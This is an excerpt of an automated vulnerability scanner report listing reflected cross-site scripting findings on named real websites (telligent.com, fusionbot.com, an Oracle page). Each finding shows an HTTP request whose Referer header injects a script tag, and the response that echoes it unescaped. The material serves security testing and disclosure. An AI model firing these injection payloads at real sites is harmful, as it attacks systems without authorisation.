<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink">
...[SNIP]...

3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/request_a_demo.aspx

Request

GET /products/request_a_demo.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:57 GMT
Connection: close
Content-Length: 66403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730">
...[SNIP]...

3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1343205.aspx

Request

GET /resources/m/analysts/1343205.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 64261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb">
...[SNIP]...

3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1345217.aspx

Request

GET /resources/m/analysts/1345217.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:36 GMT
Connection: close
Content-Length: 64972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669">
...[SNIP]...

3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/success_stories/1331597.aspx

Request

GET /resources/m/success_stories/1331597.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 64200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3">
...[SNIP]...

3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/request_an_upgrade/

Request

GET /support/request_an_upgrade/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:35 GMT
Connection: close
Content-Length: 61451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44">
...[SNIP]...

3.235. http://www.fusionbot.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

GET / HTTP/1.1
Host: www.fusionbot.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-88